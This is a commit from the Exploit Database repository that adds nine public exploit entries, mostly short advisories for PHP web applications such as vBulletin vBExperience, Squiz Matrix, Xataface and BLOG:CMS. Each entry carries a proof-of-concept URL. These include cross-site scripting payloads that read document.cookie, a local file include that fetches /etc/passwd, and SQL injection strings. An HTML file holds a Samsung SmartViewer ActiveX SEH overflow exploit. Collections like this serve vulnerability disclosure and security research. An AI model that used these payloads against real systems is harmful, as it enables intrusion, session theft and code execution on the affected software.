Update: 2015-01-21

9 new exploits
This commit is contained in:
Offensive Security 2015-01-21 08:35:27 +00:00
parent 77291f0ca3
commit 66b6bb6da3
10 changed files with 127 additions and 0 deletions

View file

@ -32274,3 +32274,12 @@ id,file,description,date,author,platform,type,port
35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 'CKEditorFuncNum' Parameter Cross Site Scripting Vulnerability",2011-06-06,"AutoSec Tools",php,webapps,0
35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes 'test.php' Cross Site Scripting Vulnerability",2011-06-06,MustLive,php,webapps,0
35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0
35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48106/info
vBulletin vBExperience is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vBulletin vBExperience 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/xperience.php?sortfield=xr&sortorder="><script>alert(1);</script>

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48108/info
http://www.noticeboardpro.com/notice-board-pro-copyright.htmlJoomla CCBoard is prone to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_ccboard&view=postlist&forum=1&topic=2

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48109/info
Nakid CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Nakid CMS 1.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/cms/assets/addons/kcfinder/browse.php?CKEditorFuncNum=0);alert(0);//

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48110/info
Multiple WordPress WooThemes (Live Wire) are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/_theme's_name_/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/48113/info
PopScript is prone to a remote file-include vulnerability, an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to execute arbitrary local and remote scripts in the context of the webserver process, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass the authentication control.
http://www.example.com/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]
http://www.example.com/index.php?mode=[Shell txt]?&password=nassrawi&remember=ON

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48118/info
Squiz Matrix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Squiz Matrix 4.0.6 and 4.2.2 are vulnerable; other versions may also be affected.
http://www.example.com/__lib/html_form/colour_picker.php?colour=';%20alert(document.cookie);%20var%20x='&pickerid=000000

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48126/info
Xataface is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
NOTE (July 4, 2011): The vendor indicates that this issue affects versions prior to Xataface 1.2.6, while the reporter indicates 1.3rc1 and 1.3rc2 are affected.
http://www.example.com/index.php?-action=../../../../../../etc/passwd%00

15
platforms/php/webapps/35834.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/48132/info
BLOG:CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
BLOG:CMS 4.2.1.f is vulnerable; other versions may also be affected.
http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(&#039;XSS&#039;);</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>
http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php

View file

@ -0,0 +1,45 @@
<html>
<!--
Samsung SmartViewer BackupToAvi Remote Code Execution PoC
PoC developed by Praveen Darshanam
For more details refer
http://darshanams.blogspot.com
http://blog.disects.com/2015/01/samsung-smartviewer-backuptoavi-remote.html
Original Vulnerability Discovered by rgod
Vulnerable: Samsung SmartViewer 3.0
Tested on Windows 7 Ultimate N SP1
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
-->
<object classid='clsid:208650B1-3CA1-4406-926D-45F2DBB9C299' id='target' ></object>
<script >
var payload_length = 15000;
var arg1=1;
var arg2=1;
var arg3=1;
//blank strings
var junk = "";
var buf1 = "";
var buf2 = "";
//offset to SE is 156, initial analysis using metasploit cyclic pattern
for (i=0; i<156; i++)
{
buf1 += "A";
}
var nseh = "DD";
var seh = "\x87\x10"; //from Vulnerable DLL
junk = buf1 + nseh + seh;
//remaining buffer
for (j=0; j<(payload_length-junk.length); j++)
{
buf2 += "B";
}
//final malicious buffer
var fbuff = junk + buf2;
target.BackupToAvi(arg1 ,arg2 ,arg3 ,fbuff);
</script>
</html>